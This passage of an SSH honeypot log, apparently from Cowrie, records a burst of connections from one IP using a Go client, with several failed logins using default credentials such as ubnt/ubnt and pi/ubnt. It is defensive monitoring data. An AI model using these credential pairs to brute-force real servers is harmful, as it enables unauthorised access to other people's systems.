{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:25.490172Z","src_ip":"212.227.125.160","session":"f339561b89ba"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53872,"dst_ip":"1.2.3.4","dst_port":22,"session":"8a17e3b8099f","protocol":"ssh","message":"New connection: 212.227.125.160:53872 (1.2.3.4:22) [session: 8a17e3b8099f]","sensor":"my-vps","timestamp":"2025-08-26T11:33:25.497955Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:25.498559Z","src_ip":"212.227.125.160","session":"8a17e3b8099f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53880,"dst_ip":"1.2.3.4","dst_port":22,"session":"5a54479bab4e","protocol":"ssh","message":"New connection: 212.227.125.160:53880 (1.2.3.4:22) [session: 5a54479bab4e]","sensor":"my-vps","timestamp":"2025-08-26T11:33:25.512368Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:25.513282Z","src_ip":"212.227.125.160","session":"5a54479bab4e"}
{"eventid":"cowrie.login.failed","username":"noc","password":"pi","message":"login attempt [noc/pi] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:25.517528Z","src_ip":"212.227.125.160","session":"fa5053822c15"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:25.541792Z","src_ip":"212.227.125.160","session":"8a17e3b8099f"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:25.555748Z","src_ip":"212.227.125.160","session":"5a54479bab4e"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:25.557610Z","src_ip":"212.227.125.160","session":"355b6e6df0b1"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:25.566994Z","src_ip":"212.227.125.160","session":"137a9f7c1dd3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53894,"dst_ip":"1.2.3.4","dst_port":22,"session":"f3bc824f4d6c","protocol":"ssh","message":"New connection: 212.227.125.160:53894 (1.2.3.4:22) [session: f3bc824f4d6c]","sensor":"my-vps","timestamp":"2025-08-26T11:33:25.598879Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:25.599484Z","src_ip":"212.227.125.160","session":"f3bc824f4d6c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53908,"dst_ip":"1.2.3.4","dst_port":22,"session":"6009c6a5eb9e","protocol":"ssh","message":"New connection: 212.227.125.160:53908 (1.2.3.4:22) [session: 6009c6a5eb9e]","sensor":"my-vps","timestamp":"2025-08-26T11:33:25.608173Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:25.609576Z","src_ip":"212.227.125.160","session":"6009c6a5eb9e"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"ubnt","message":"login attempt [ftpuser/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:25.619589Z","src_ip":"212.227.125.160","session":"f339561b89ba"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:25.641641Z","src_ip":"212.227.125.160","session":"f3bc824f4d6c"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:25.652646Z","src_ip":"212.227.125.160","session":"6009c6a5eb9e"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"ubnt","message":"login attempt [ftpuser/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:25.675434Z","src_ip":"212.227.125.160","session":"8a17e3b8099f"}
{"eventid":"cowrie.login.failed","username":"student","password":"ubnt","message":"login attempt [student/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:25.685731Z","src_ip":"212.227.125.160","session":"5a54479bab4e"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ubnt","message":"login attempt [ubnt/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:25.776199Z","src_ip":"212.227.125.160","session":"f3bc824f4d6c"}
{"eventid":"cowrie.login.failed","username":"pi","password":"ubnt","message":"login attempt [pi/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-26T11:33:25.819784Z","src_ip":"212.227.125.160","session":"6009c6a5eb9e"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:26.604776Z","src_ip":"212.227.125.160","session":"fa5053822c15"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53910,"dst_ip":"1.2.3.4","dst_port":22,"session":"a3aa63eeb093","protocol":"ssh","message":"New connection: 212.227.125.160:53910 (1.2.3.4:22) [session: a3aa63eeb093]","sensor":"my-vps","timestamp":"2025-08-26T11:33:26.657826Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:26.711763Z","src_ip":"212.227.125.160","session":"a3aa63eeb093"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:26.712816Z","src_ip":"212.227.125.160","session":"a3aa63eeb093"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:26.741217Z","src_ip":"212.227.125.160","session":"f339561b89ba"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:26.779767Z","src_ip":"212.227.125.160","session":"8a17e3b8099f"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:26.780800Z","src_ip":"212.227.125.160","session":"5a54479bab4e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53916,"dst_ip":"1.2.3.4","dst_port":22,"session":"01ae44aa2c2a","protocol":"ssh","message":"New connection: 212.227.125.160:53916 (1.2.3.4:22) [session: 01ae44aa2c2a]","sensor":"my-vps","timestamp":"2025-08-26T11:33:26.812357Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53924,"dst_ip":"1.2.3.4","dst_port":22,"session":"d348c28ce680","protocol":"ssh","message":"New connection: 212.227.125.160:53924 (1.2.3.4:22) [session: d348c28ce680]","sensor":"my-vps","timestamp":"2025-08-26T11:33:26.837273Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53938,"dst_ip":"1.2.3.4","dst_port":22,"session":"63d57026bc16","protocol":"ssh","message":"New connection: 212.227.125.160:53938 (1.2.3.4:22) [session: 63d57026bc16]","sensor":"my-vps","timestamp":"2025-08-26T11:33:26.840163Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:26.857530Z","src_ip":"212.227.125.160","session":"01ae44aa2c2a"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:26.858168Z","src_ip":"212.227.125.160","session":"01ae44aa2c2a"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:26.864077Z","src_ip":"212.227.125.160","session":"f3bc824f4d6c"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:26.880418Z","src_ip":"212.227.125.160","session":"63d57026bc16"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:26.903922Z","src_ip":"212.227.125.160","session":"d348c28ce680"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:26.906106Z","src_ip":"212.227.125.160","session":"d348c28ce680"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:33:26.919357Z","src_ip":"212.227.125.160","session":"6009c6a5eb9e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53950,"dst_ip":"1.2.3.4","dst_port":22,"session":"8fc2ba0ac868","protocol":"ssh","message":"New connection: 212.227.125.160:53950 (1.2.3.4:22) [session: 8fc2ba0ac868]","sensor":"my-vps","timestamp":"2025-08-26T11:33:26.924833Z"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:26.944397Z","src_ip":"212.227.125.160","session":"63d57026bc16"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53964,"dst_ip":"1.2.3.4","dst_port":22,"session":"39322e43a0fe","protocol":"ssh","message":"New connection: 212.227.125.160:53964 (1.2.3.4:22) [session: 39322e43a0fe]","sensor":"my-vps","timestamp":"2025-08-26T11:33:26.971848Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:27.003594Z","src_ip":"212.227.125.160","session":"8fc2ba0ac868"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:33:27.004564Z","src_ip":"212.227.125.160","session":"8fc2ba0ac868"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:33:27.014972Z","src_ip":"212.227.125.160","session":"39322e43a0fe"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 